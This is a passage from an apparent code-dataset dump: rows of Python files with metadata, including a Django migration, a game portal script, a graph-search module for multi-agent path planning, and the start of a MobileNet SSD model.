                ('num', models.IntegerField(blank=True, null=True)),
                ('judge', models.CharField(max_length=255)),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
            ],
        ),
        migrations.CreateModel(
            name='RawSong',
            fields=[
                ('id', models.IntegerField(editable=False, primary_key=True, serialize=False)),
                ('season', models.CharField(max_length=255)),
                ('year', models.IntegerField()),
                ('district', models.CharField(max_length=255)),
                ('event', models.CharField(max_length=255)),
                ('session', models.CharField(max_length=255)),
                ('group_name', models.CharField(max_length=255)),
                ('appearance_num', models.IntegerField()),
                ('song_num', models.IntegerField()),
                ('song_title', models.CharField(max_length=255)),
                ('totals', models.IntegerField()),
                ('scores', django.contrib.postgres.fields.jsonb.JSONField()),
            ],
        ),
        migrations.CreateModel(
            name='Selection',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('mark', models.BooleanField(default=False)),
                ('row_id', models.IntegerField(blank=True, null=True)),
                ('year', models.IntegerField(blank=True, null=True)),
                ('season_kind', models.IntegerField(blank=True, choices=[(1, 'Summer'), (2, 'Midwinter'), (3, 'Fall'), (4, 'Spring')], null=True)),
                ('district_code', models.CharField(blank=True, max_length=255)),
                ('convention_name', models.CharField(blank=True, max_length=255)),
                ('session_kind', models.IntegerField(blank=True, choices=[(32, 'Chorus'), (41, 'Quartet'), (42, 'Mixed'), (43, 'Senior'), (44, 'Youth'), (45, 'Unknown'), (46, 'VLQ')], null=True)),
                ('round_kind', models.IntegerField(blank=True, choices=[(1, 'Finals'), (2, 'Semi-Finals'), (3, 'Quarter-Finals')], null=True)),
                ('group_name', models.CharField(blank=True, max_length=255)),
                ('appearance_num', models.IntegerField(blank=True, null=True)),
                ('song_num', models.IntegerField(blank=True, null=True)),
                ('song_title', models.CharField(blank=True, max_length=255)),
                ('totals', models.IntegerField(blank=True, null=True)),
                ('points', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(blank=True, null=True), blank=True, null=True, size=None)),
                ('song', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Song')),
            ],
        ),
        migrations.AddField(
            model_name='flat',
            name='selection',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flats', to='keller.Selection'),
        ),
        migrations.AddField(
            model_name='cleanflat',
            name='cleanpanelist',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanPanelist'),
        ),
        migrations.AddField(
            model_name='cleanflat',
            name='cleansong',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cleanflats', to='keller.CleanSong'),
        ),
        migrations.AddField(
            model_name='cleanflat',
            name='score',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rmanager.Score'),
        ),
        migrations.AlterUniqueTogether(
            name='flat',
            unique_together={('complete', 'selection', 'score')},
        ),
        migrations.AlterUniqueTogether(
            name='cleanflat',
            unique_together={('cleanpanelist', 'cleansong')},
        ),
    ]
| 59.315789 | 196 | 0.577147 | 1,010 | 10,143 | 5.70198 | 0.135644 | 0.121896 | 0.054176 | 0.083348 | 0.837472 | 0.805869 | 0.752214 | 0.723042 | 0.682063 | 0.682063 | 0 | 0.026402 | 0.249433 | 10,143 | 170 | 197 | 59.664706 | 0.730067 | 0.004437 | 0 | 0.638037 | 1 | 0 | 0.146593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030675 | 0 | 0.055215 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ad0d3000ed7a4634033b1ce00bdd993cdd7ea6e4 | 47 | py | Python | scripts/portal/dublportal100.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 54 | 2019-04-16T23:24:48.000Z | 2021-12-18T11:41:50.000Z | scripts/portal/dublportal100.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 3 | 2019-05-19T15:19:41.000Z | 2020-04-27T16:29:16.000Z | scripts/portal/dublportal100.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 49 | 2020-11-25T23:29:16.000Z | 2022-03-26T16:20:24.000Z | # 103050100
sm.warp(103050200, 4)
sm.dispose()
| 11.75 | 21 | 0.723404 | 7 | 47 | 4.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.452381 | 0.106383 | 47 | 3 | 22 | 15.666667 | 0.357143 | 0.191489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ad59bc15df66a5d6f6a17682c953d0484283946e | 45 | py | Python | catkin_ws/src/00-infrastructure/duckieteam/include/duckieteam/__init__.py | yxiao1996/dev | e2181233aaa3d16c472b792b58fc4863983825bd | [
"CC-BY-2.0"
] | 2 | 2018-06-25T02:51:25.000Z | 2018-06-25T02:51:27.000Z | catkin_ws/src/00-infrastructure/duckieteam/include/duckieteam/__init__.py | yxiao1996/dev | e2181233aaa3d16c472b792b58fc4863983825bd | [
"CC-BY-2.0"
] | null | null | null | catkin_ws/src/00-infrastructure/duckieteam/include/duckieteam/__init__.py | yxiao1996/dev | e2181233aaa3d16c472b792b58fc4863983825bd | [
"CC-BY-2.0"
] | 2 | 2018-09-04T06:44:21.000Z | 2018-10-15T02:30:50.000Z | from .persons import *
from .robots import *
| 15 | 22 | 0.733333 | 6 | 45 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 23 | 22.5 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad6a31cb2085aa5bd0305d46eb55ea7c71a04f08 | 27 | py | Python | jammit/jammit/__init__.py | granatumx/gbox-py | b3e264a22bc6a041f2dd631d952eae29c0ecae21 | [
"MIT"
] | 1 | 2021-03-04T13:04:28.000Z | 2021-03-04T13:04:28.000Z | g_packages/official_py_docker/docker/jammit/jammit/__init__.py | lanagarmire/granatumx | 3dee3a8fb2ba851c31a9f6338aef1817217769f9 | [
"MIT"
] | 16 | 2020-01-28T23:03:40.000Z | 2022-02-10T00:30:16.000Z | g_packages/official_py_docker/docker/jammit/jammit/__init__.py | lanagarmire/granatumx | 3dee3a8fb2ba851c31a9f6338aef1817217769f9 | [
"MIT"
] | 2 | 2020-06-16T16:42:40.000Z | 2020-08-28T16:59:42.000Z | from .jammit import JAMMIT
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad7b706a45500d6856a11d91d70bdd1d19d2a3c5 | 38 | py | Python | bayesian_irl/src/utils/__init__.py | clear-nus/BOIRL | cc872111fda3c7b8118e1a864831013c30f63948 | [
"MIT"
] | 1 | 2021-02-26T10:09:15.000Z | 2021-02-26T10:09:15.000Z | bayesian_irl/src/utils/__init__.py | clear-nus/BOIRL | cc872111fda3c7b8118e1a864831013c30f63948 | [
"MIT"
] | null | null | null | bayesian_irl/src/utils/__init__.py | clear-nus/BOIRL | cc872111fda3c7b8118e1a864831013c30f63948 | [
"MIT"
] | null | null | null | from .sample_demos import sample_demos | 38 | 38 | 0.894737 | 6 | 38 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ad8b2ae891c777a11dd0d08281170aecd58b4675 | 15,903 | py | Python | multiagant_task_manager/maGraphEngines.py | Benson516/multiagant_task_manager | a70eacbb47a7c7243811fbaadb5b3c4ab4c6d703 | [
"MIT"
] | null | null | null | multiagant_task_manager/maGraphEngines.py | Benson516/multiagant_task_manager | a70eacbb47a7c7243811fbaadb5b3c4ab4c6d703 | [
"MIT"
] | null | null | null | multiagant_task_manager/maGraphEngines.py | Benson516/multiagant_task_manager | a70eacbb47a7c7243811fbaadb5b3c4ab4c6d703 | [
"MIT"
] | null | null | null | """
Graph engines
These functions are graph engines specifically for use with
the graph data structure defined by GEOMETRY_TASK_GRAPH
and its sub-classes.
"""
import Queue
# import sys
# Kernel function for finding reachability
def Explore(nid, adj, visited):
    """
    Recursive function for depth-first search.
    """
    visited[nid] = True
    for to_nid, eid in adj[nid]:
        if not visited[to_nid]:
            Explore(to_nid, adj, visited)
    # the end
# Kernel function for finding reachability
def Explore_capacity(nid, adj, edges, visited, T_zone, only_count_activated_agent=False):
    """
    Recursive function for depth-first search.
    """
    visited[nid] = True
    for to_nid, eid in adj[nid]:
        if not visited[to_nid] and edges[eid].is_available_for_T_zone(T_zone, only_count_activated_agent):
            Explore_capacity(to_nid, adj, edges, visited, T_zone, only_count_activated_agent)
    # the end
# Kernel function for finding connected components
def Explore_cc(nid, adj, visited, cc, CCnum):
    """
    Recursive function for depth-first search.
    """
    visited[nid] = True
    CCnum[nid] = cc
    for to_nid, eid in adj[nid]:
        if not visited[to_nid]:
            Explore_cc(to_nid, adj, visited, cc, CCnum)
    # the end
# Kernel function for finding connected components
def Explore_cc_capcity(nid, adj, edges, visited, cc, CCnum, T_zone, only_count_activated_agent=False):
    """
    Recursive function for depth-first search.
    """
    visited[nid] = True
    CCnum[nid] = cc
    for to_nid, eid in adj[nid]:
        if not visited[to_nid] and edges[eid].is_available_for_T_zone(T_zone, only_count_activated_agent):
            Explore_cc_capcity(to_nid, adj, edges, visited, cc, CCnum, T_zone, only_count_activated_agent)
    # the end
#------------------------------------------------#
def reachability(x, y, adj, edges=None, count_capacity=True, T_zone=(0,None), only_count_activated_agent=False):
    """
    Find the reachability from node_id:x to node_id:y
    Important: This method only considers the current
               (a specific time instant) topological state.
    """
    visited = [False for _ in range(len(adj))]
    if count_capacity:
        Explore_capacity(x, adj, edges, visited, T_zone, only_count_activated_agent)
    else:
        # Simply traverse through the topology of the graph,
        # not counting the capacity of edges
        Explore(x, adj, visited)
    return visited[y]
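# Illustration only: a self-contained sketch of the capacity-free branch above.
# The toy graph and the lowercase `explore`/`reachable` helpers are hypothetical
# stand-ins that mirror Explore() and reachability(..., count_capacity=False).

```python
# adj[nid] is a list of (to_nid, eid) pairs, as in GEOMETRY_TASK_GRAPH.
adj = [
    [(1, 0)],   # node 0 -> node 1 via edge 0
    [(2, 1)],   # node 1 -> node 2 via edge 1
    [],         # node 2: no outgoing edges
    [(0, 2)],   # node 3 -> node 0 via edge 2
]

def explore(nid, adj, visited):
    # Depth-first search, ignoring edge capacities.
    visited[nid] = True
    for to_nid, eid in adj[nid]:
        if not visited[to_nid]:
            explore(to_nid, adj, visited)

def reachable(x, y, adj):
    visited = [False for _ in range(len(adj))]
    explore(x, adj, visited)
    return visited[y]

print(reachable(0, 2, adj))  # True
print(reachable(0, 3, adj))  # False (edges are directed)
```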
def number_of_connected_components(adj, edges=None, count_capacity=True, T_zone=(0,None), only_count_activated_agent=False):
    """
    Find the total number of connected components
    Important: This method only considers the current
               (a specific time instant) topological state.
    """
    visited = [False for _ in range(len(adj))]
    CCnum = [0 for _ in range(len(adj))]
    cc = 1
    if count_capacity:
        for nid in range(len(adj)):
            if not visited[nid]:
                Explore_cc_capcity(nid, adj, edges, visited, cc, CCnum, T_zone, only_count_activated_agent)
                cc += 1
    else:
        # Simply traverse through the topology of the graph,
        # not counting the capacity of edges
        for nid in range(len(adj)):
            if not visited[nid]:
                Explore_cc(nid, adj, visited, cc, CCnum)
                cc += 1
    return (cc-1)
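# A capacity-free sketch of the component count above. The toy graph (with
# symmetric directed edges) and the helper names are made up for illustration.

```python
# Two mutually linked pairs plus one isolated node -> 3 components.
adj = [[(1, 0)], [(0, 0)], [(3, 1)], [(2, 1)], []]

def explore_cc(nid, adj, visited):
    # Depth-first search marking every node in the current component.
    visited[nid] = True
    for to_nid, eid in adj[nid]:
        if not visited[to_nid]:
            explore_cc(to_nid, adj, visited)

def count_components(adj):
    visited = [False for _ in range(len(adj))]
    cc = 0
    for nid in range(len(adj)):
        if not visited[nid]:
            explore_cc(nid, adj, visited)
            cc += 1
    return cc

print(count_components(adj))  # 3
```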
# Graph traversal
#--------------------------------#
def get_path(prev, last_nid, is_reversing_path=True):
    """
    This utility function helps generate the path from the parent list.
    inputs
        - prev
        - last_nid: the node_id to start backtracking with
        - is_reversing_path (default: True): Decide if we are going to return the path generated by following the parent list
    outputs
        - path
    """
    nid_i = last_nid
    path_inv = list()
    path_inv.append(nid_i)
    while True:
        nid_prev = prev[nid_i]
        if not nid_prev is None:
            nid_i = nid_prev
            path_inv.append(nid_prev)
        else:
            # No parent, not able to continue
            break
    #
    if is_reversing_path:
        # Reverse the path, making it run from start_id to end_id
        path = path_inv[::-1]
        return path
    else:
        return path_inv
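# The parent-list convention used by get_path() can be exercised on its own.
# The `backtrack` helper and the toy `prev` list below are hypothetical; the
# helper just mirrors the backtracking loop above.

```python
# prev[n] is the parent of node n in the search tree; None means no parent.
prev = [None, 0, 1, 1]   # tree rooted at node 0: 0 -> 1 -> {2, 3}

def backtrack(prev, last_nid):
    # Follow parents from last_nid up to the root, then reverse.
    path = [last_nid]
    while prev[path[-1]] is not None:
        path.append(prev[path[-1]])
    return path[::-1]

print(backtrack(prev, 2))  # [0, 1, 2]
print(backtrack(prev, 3))  # [0, 1, 3]
```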
def dijkstras(adj, edges, T_zone_start, start_id, end_id, top_priority_for_activated_agent=False, agent_id=None):
    """
    This method uses the Dijkstra algorithm to find the best path
    or find out that there is no path at all.
    Optimization problem:
        Given a graph, the state of the graph, and the time-zone at start_id,
        find a path with "valid edges" that minimizes the
        "duration_max" at reaching the end_id
        (after passing through the last edge)
    inputs
        - adj: adjacency graph
        - T_zone_start = (T_min, T_max)
        - start_id
        - end_id
        - top_priority_for_activated_agent
        - agent_id (default: None): If agent_id is given, ignore this agent in this edge.
    outputs
        - path/None: a sequence (list) of node_id from start_id to end_id,
                     or "None", which means no valid path
    """
    # Decide if we only see the activated agents!!
    only_count_activated_agent = top_priority_for_activated_agent
    # We minimize the T_max
    id_opt_target = 1  # minimize the total duration_max
    max_value = float('inf')  # sys.maxsize
    # Get sizes
    num_nodes = len(adj)
    num_edges = len(edges)
    # Initialize the dist and prev
    dist = [max_value for _ in range(num_nodes)]  # distance list, "None" stands for infinity
    prev = [None for _ in range(num_nodes)]  # parent list, "None" stands for no parent
    T_zone_nodes = [(max_value, max_value) for _ in range(num_nodes)]  # (T_min, T_max) of each node / "key" for passing edges!
    #-------------------------------#
    # dist[s] = 0 <-- actually, the minimum distance in the graph; it does not need to be zero
    dist[start_id] = 0  # Count for the duration, minimum or maximum (or maybe the difference??)
    T_zone_nodes[start_id] = T_zone_start
    # Make a min-heap
    heap = Queue.PriorityQueue()
    for u in range(num_nodes):
        heap.put_nowait( (dist[u], u) )
    # Iteration
    while (not heap.empty()):
        # Get a node_id from the heap (currently smallest distance)
        #----------------------------------#
        uh = heap.get_nowait()
        # Filter out stale entries in the heap
        while uh[0] != dist[uh[1]] and (not heap.empty()):
            # Pop out the old one and try a new one
            uh = heap.get_nowait()
        if heap.empty():
            # This means that the heap actually has nothing valuable
            # in this iteration, just leave
            break
        #----------------------------------#
        # for all (u,v) in E
        # We have to find nodes through "valid" edges,
        # that is, edges that are "possible to pass" and activated (if we want to check)
        nid_u = uh[1]
        # print("uh[0] = " + str(uh[0]) + ", uh[1] = " + str(uh[1]))
        for nid_v, eid in adj[nid_u]:
            # Check if the edge is "valid"
            # nid_u --eid--> nid_v
            if edges[eid].is_possible_to_pass(T_zone_nodes[nid_u], only_count_activated_agent, agent_id):
                # Relax
                if id_opt_target == 2:
                    weight_uv = edges[eid].duration[1] - edges[eid].duration[0]  # Minimize the difference of duration_max and duration_min, for minimizing the uncertainties
                else:
                    weight_uv = edges[eid].duration[id_opt_target]  # Minimize the total duration with the specified id_opt_target
                #
                if dist[nid_v] > (dist[nid_u] + weight_uv):
                    dist[nid_v] = (dist[nid_u] + weight_uv)
                    T_zone_nodes[nid_v] = edges[eid].get_T_zone_end_from_start(T_zone_nodes[nid_u])  # Update the time_zone of the node
                    prev[nid_v] = nid_u
                    """
                    print("update (u, v) = (%d, %d)" % (nid_u, nid_v))
                    print("dist = " + str(dist))
                    print("prev = " + str(prev))
                    print("\n")
                    """
                    heap.put_nowait( (dist[nid_v], nid_v) )
        #
        # end for
    # end while
    """
    # Post processing: replace max_value with "None"
    for i in range(len(dist)):
        if dist[i] == max_value:
            dist[i] = None
    """
    # test
    try:
        delta_T_max = dist[end_id] - dist[start_id]
    except:
        delta_T_max = None
    #
    print("\n")
    print("INFO: Dijkstra finished")
    print("INFO: Distance from start_id <%d> to end_id <%d> = %s" % (start_id, end_id, (str(delta_T_max) if not delta_T_max is None else "None" ) ) )
    print("dist = " + str(dist))
    print("prev = " + str(prev))
    print("T_zone_nodes[end_id] = " + str(T_zone_nodes[end_id]))
    #
    # Generate the path
    if (dist[end_id] is None) or (dist[end_id] == max_value):
        # The end_id is not reachable from start_id
        # in the sense of "valid" edge traversal
        print('INFO: The end_id is not reachable from start_id in the sense of "valid" edge traversal.')
        return None
    # If the goal is reachable
    path = get_path(prev, end_id, is_reversing_path=True)
    if path[0] != start_id:
        print("ERROR: path[0] != start_id, something wrong in dijkstras.")
    else:
        # print("INFO: The path was generated correctly in dijkstras.")
        pass
    # test
    print("path = " + str(path))
    print("\n")
    #
    return path
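# Setting the T_zone bookkeeping aside, the relaxation above is standard
# Dijkstra with lazy deletion. A compact, self-contained reference sketch with
# plain edge weights (heapq-based; the toy graph and names are hypothetical):

```python
import heapq

# adj[u] = [(v, weight), ...]; a plain weight stands in for duration_max here.
adj = [
    [(1, 4.0), (2, 1.0)],
    [(3, 1.0)],
    [(1, 2.0), (3, 5.0)],
    [],
]

def dijkstra(adj, start):
    inf = float('inf')
    dist = [inf] * len(adj)
    prev = [None] * len(adj)
    dist[start] = 0.0
    heap = [(0.0, start)]
    while heap:
        d_u, u = heapq.heappop(heap)
        if d_u != dist[u]:
            continue  # stale heap entry; same idea as the filtering loop above
        for v, w in adj[u]:
            if dist[v] > d_u + w:
                dist[v] = d_u + w
                prev[v] = u
                heapq.heappush(heap, (dist[v], v))
    return dist, prev

dist, prev = dijkstra(adj, 0)
print(dist)  # [0.0, 3.0, 1.0, 4.0]
print(prev)  # [None, 2, 0, 1]
```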
#--------------------------------#
# Reversed traversal
#--------------------------------------#
def generate_reverse_graph(adj):
    """
    This function is for use with the adj_graph defined in GEOMETRY_TASK_GRAPH
    outputs
        - adj_reversed: a reversed version of adj (All directed edges will be reversed.)
    """
    adj_reversed = [[] for _ in range(len(adj))]
    for nid_u in range(len(adj)):
        for nid_v, eid_uv in adj[nid_u]:
            adj_reversed[nid_v].append( (nid_u, eid_uv) )
    #
    return adj_reversed
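# A quick check of the edge-id bookkeeping when reversing. The routine below is
# the same as generate_reverse_graph() above; the toy graph is made up.

```python
def generate_reverse_graph(adj):
    # Flip every directed edge (u -> v, eid) into (v -> u, eid).
    adj_reversed = [[] for _ in range(len(adj))]
    for nid_u in range(len(adj)):
        for nid_v, eid_uv in adj[nid_u]:
            adj_reversed[nid_v].append((nid_u, eid_uv))
    return adj_reversed

adj = [[(1, 0), (2, 1)], [(2, 2)], []]
print(generate_reverse_graph(adj))  # [[], [(0, 0)], [(0, 1), (1, 2)]]
```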
def dijkstras_backtrack(adj_in, edges, T_zone_end, start_id, end_id, top_priority_for_activated_agent=False, agent_id=None):
    """
    This method uses Dijkstra's algorithm to find the best path,
    or to find out that there is no path at all.
    Optimization problem:
        Given a graph, the state of the graph, and the time-zone at end_id,
        find a path with "valid edges" that minimizes the
        "duration_max" on reaching start_id
        (before passing through the first edge).
    inputs
    - adj_in: original adjacency graph
    - T_zone_end = (T_min, T_max)
    - start_id
    - end_id
    - top_priority_for_activated_agent
    - agent_id (default: None): if agent_id is given, ignore this agent on each edge.
    outputs
    - path/None: a sequence (list) of node_id from start_id to end_id,
                 or None, which means there is no valid path
    """
    # Get a reversed graph
    adj = generate_reverse_graph(adj_in)
    # Decide whether we only consider the activated agent
    only_count_activated_agent = top_priority_for_activated_agent
    # We minimize the T_max
    id_opt_target = 1  # minimize the total duration_max
    max_value = float('inf')  # sys.maxsize
    # Get sizes
    num_nodes = len(adj)
    num_edges = len(edges)
    # Initialize dist and prev
    dist = [max_value for _ in range(num_nodes)]  # distance list; max_value stands for infinity
    prev = [None for _ in range(num_nodes)]  # parent list; None stands for no parent
    T_zone_nodes = [(max_value, max_value) for _ in range(num_nodes)]  # (T_min, T_max) of each node / the "key" for passing edges
    #-------------------------------#
    # dist[s] = 0  <-- actually the minimum distance in the graph; it does not need to be zero
    dist[end_id] = 0  # counts the duration, minimum or maximum (or maybe the difference)
    T_zone_nodes[end_id] = T_zone_end
    # Make a min-heap
    heap = Queue.PriorityQueue()
    for u in range(num_nodes):
        heap.put_nowait((dist[u], u))
    # Iteration
    while not heap.empty():
        # Get a node_id from the heap (currently smallest distance)
        #----------------------------------#
        uh = heap.get_nowait()
        # Filter out stale entries in the heap
        while uh[0] != dist[uh[1]] and (not heap.empty()):
            # Pop out the old one and try a new one
            uh = heap.get_nowait()
        if heap.empty():
            # The heap holds nothing valuable in this iteration; just leave
            break
        #----------------------------------#
        # For all (u, v) in E:
        # we have to find nodes through "valid" edges,
        # that is, edges that are "possible to pass" and activated (if we want to check)
        nid_u = uh[1]
        # print("uh[0] = " + str(uh[0]) + ", uh[1] = " + str(uh[1]))
        for nid_v, eid in adj[nid_u]:
            # Check if the edge nid_u --eid--> nid_v is "valid"
            if edges[eid].is_possible_to_pass_backtrack(T_zone_nodes[nid_u], only_count_activated_agent, agent_id):
                T_v_tmp = edges[eid].get_T_zone_start_from_end(T_zone_nodes[nid_u])  # candidate time_zone for the node
                if T_v_tmp[1] < T_v_tmp[0]:
                    # This edge is closed and cannot be backtracked
                    continue
                # Relax
                if id_opt_target == 2:
                    weight_uv = edges[eid].duration[1] - edges[eid].duration[0]  # minimize (duration_max - duration_min) to reduce the uncertainty
                else:
                    weight_uv = edges[eid].duration[id_opt_target]  # minimize the total duration with the specified id_opt_target
                #
                if dist[nid_v] > (dist[nid_u] + weight_uv):
                    dist[nid_v] = dist[nid_u] + weight_uv
                    T_zone_nodes[nid_v] = T_v_tmp  # update the time_zone of the node
                    prev[nid_v] = nid_u
                    """
                    print("update (u, v) = (%d, %d)" % (nid_u, nid_v))
                    print("dist = " + str(dist))
                    print("prev = " + str(prev))
                    print("\n")
                    """
                    heap.put_nowait((dist[nid_v], nid_v))
        # end for
    # end while
    """
    # Post-processing: replace max_value with None
    for i in range(len(dist)):
        if dist[i] == max_value:
            dist[i] = None
    """
    # test
    try:
        delta_T_max = dist[start_id] - dist[end_id]
    except TypeError:
        delta_T_max = None
    #
    print("\n")
    print("INFO: Dijkstra (backtrack) finished")
    print("INFO: Distance from start_id <%d> to end_id <%d> = %s" % (start_id, end_id, str(delta_T_max)))
    print("dist = " + str(dist))
    print("prev = " + str(prev))
    print("T_zone_nodes[start_id] = " + str(T_zone_nodes[start_id]))
    #
    # Generate the path
    if (dist[start_id] is None) or (dist[start_id] == max_value):
        # start_id is not reachable from end_id
        # in the sense of "valid" backward edge traversal
        print('INFO: The start_id is not reachable from end_id in the sense of "valid" edge backward traversal.')
        return None
    # If the goal is reachable
    path = get_path(prev, start_id, is_reversing_path=False)
    # No need to reverse the path
    if path[-1] != end_id:
        print("ERROR: path[-1] != end_id, something wrong in dijkstra.")
    else:
        # print("INFO: The path generated correctly in dijkstra.")
        pass
    # test
    print("path = " + str(path))
    print("\n")
    #
    return path
#--------------------------------------#
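The "filter out stale entries" loop above is the classic lazy-deletion trick: instead of decreasing a key inside the priority queue, a fresh `(dist, node)` pair is pushed on every relaxation and outdated pairs are skipped on pop. A minimal self-contained sketch of the same pattern with stdlib `heapq` (toy graph and weights invented for the example; the real module adds time-zone feasibility checks on top of this):

```python
import heapq

def dijkstra_lazy(adj, source):
    """Dijkstra with 'lazy deletion': stale heap entries are skipped
    when their recorded distance no longer matches dist[]."""
    dist = [float('inf')] * len(adj)
    dist[source] = 0
    heap = [(0, source)]
    while heap:
        d_u, u = heapq.heappop(heap)
        if d_u != dist[u]:
            continue  # stale entry: a shorter path to u was already found
        for v, w in adj[u]:
            if dist[u] + w < dist[v]:
                dist[v] = dist[u] + w
                heapq.heappush(heap, (dist[v], v))  # push, never decrease-key
    return dist

# Weighted toy graph: adj[u] = [(v, weight), ...]
adj = [[(1, 4), (2, 1)], [(3, 1)], [(1, 2), (3, 5)], []]
print(dijkstra_lazy(adj, 0))  # [0, 3, 1, 4]
```

The module above uses `Queue.PriorityQueue` and pre-seeds every node; `heapq` with a single seed entry behaves the same while avoiding the locking overhead of the thread-safe queue.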
#--------------------------------------#
# File: timeline/__init__.py
# Repo: meinert/timesatpoi (license: BSD-2-Clause)
#--------------------------------------#
from .core import hmm
from .timesatpoi import *
#--------------------------------------#
# File: model/mobile_ssd_v1/net.py
# Repo: BoChenUIUC/realtime-action-detection (license: MIT)
#--------------------------------------#
'''SSD model with MobileNet as feature extractor.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from torch.autograd import Variable
import sys
sys.path.insert(0, '/home/bo/research/realtime-action-detection')
from layers.functions.sph_prior_box import SphPriorBox
from data import v1, v2, v3, v4, v5
class MobileNetExtractor512(nn.Module):
    def __init__(self):
        super(MobileNetExtractor512, self).__init__()

        def conv_bn(inp, oup, stride):
            return nn.Sequential(
                nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
                nn.BatchNorm2d(oup),
                nn.ReLU(inplace=True)
            )

        def conv_dw(inp, oup, stride):
            return nn.Sequential(
                nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
                nn.BatchNorm2d(inp),
                nn.ReLU(inplace=True),
                nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
                nn.BatchNorm2d(oup),
                nn.ReLU(inplace=True),
            )

        self.model = nn.Sequential(
            conv_bn(3, 64, 2),
            conv_dw(64, 64, 1),
            conv_dw(64, 128, 2),
            conv_dw(128, 128, 1),
            conv_dw(128, 256, 2),
            conv_dw(256, 256, 1),
            conv_dw(256, 256, 1),
            conv_dw(256, 512, 1),
            conv_dw(512, 512, 1),
            conv_dw(512, 512, 1),
            conv_dw(512, 512, 2),
            conv_dw(512, 512, 1),
            conv_dw(512, 512, 1),
            conv_dw(512, 1024, 1),
            conv_dw(1024, 1024, 1),
        )
        self.extras = nn.ModuleList([
            nn.Sequential(
                nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=1),
                nn.ReLU(),
                nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, stride=2, padding=1),
                nn.ReLU()
            ),
            nn.Sequential(
                nn.Conv2d(in_channels=512, out_channels=128, kernel_size=1),
                nn.ReLU(),
                nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
                nn.ReLU()
            ),
            nn.Sequential(
                nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
                nn.ReLU(),
                nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
                nn.ReLU()
            ),
            nn.Sequential(
                nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
                nn.ReLU(),
                nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
                nn.ReLU()
            ),
            nn.Sequential(
                nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
                nn.ReLU(),
